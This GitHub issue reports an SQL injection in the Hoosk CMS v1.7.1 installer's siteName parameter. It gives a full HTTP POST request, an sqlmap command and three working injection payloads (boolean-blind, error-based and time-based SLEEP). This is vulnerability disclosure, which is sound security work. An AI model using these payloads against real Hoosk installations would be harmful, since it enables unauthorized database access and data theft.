Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SQL injection vulnerability on v1.7.1 #68

Open
YanC1e opened this issue Jan 26, 2025 · 0 comments
Open

SQL injection vulnerability on v1.7.1 #68

YanC1e opened this issue Jan 26, 2025 · 0 comments

Comments

@YanC1e
Copy link

YanC1e commented Jan 26, 2025

The vulnerability lies in /install/index.php

Lines 63-68
Image
As we can see, the siteName parameter is directly concatenated into the statement without any filtering.

POST /Hoosk-1.7.1/install/index.php HTTP/1.1
Host: 192.168.1.16
Content-Length: 214
Cache-Control: max-age=0
Origin: http://192.168.1.16
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.16/Hoosk-1.8.0/install/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

siteName=123&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost

Capture the data packet and save it as 1.txt. Use sqlmap for SQL injection.
python sqlmap.py -r 1.txt -p siteName --risk=3 --level=5 --dbms=mysql -dbs

Image

Successfully injected and the payload given by sqlmap is as follows.

Parameter: siteName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: siteName=123'+(SELECT 0x71467343 WHERE 6028=6028 AND 9890=9890)+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: siteName=123'+(SELECT 0x6f6b6255 WHERE 2162=2162 AND GTID_SUBSET(CONCAT(0x717a626271,(SELECT (ELT(2605=2605,1))),0x716a6b7a71),2605))+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: siteName=123'+(SELECT 0x46574d4d WHERE 1554=1554 AND (SELECT 2156 FROM (SELECT(SLEEP(5)))Msqm))+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@YanC1e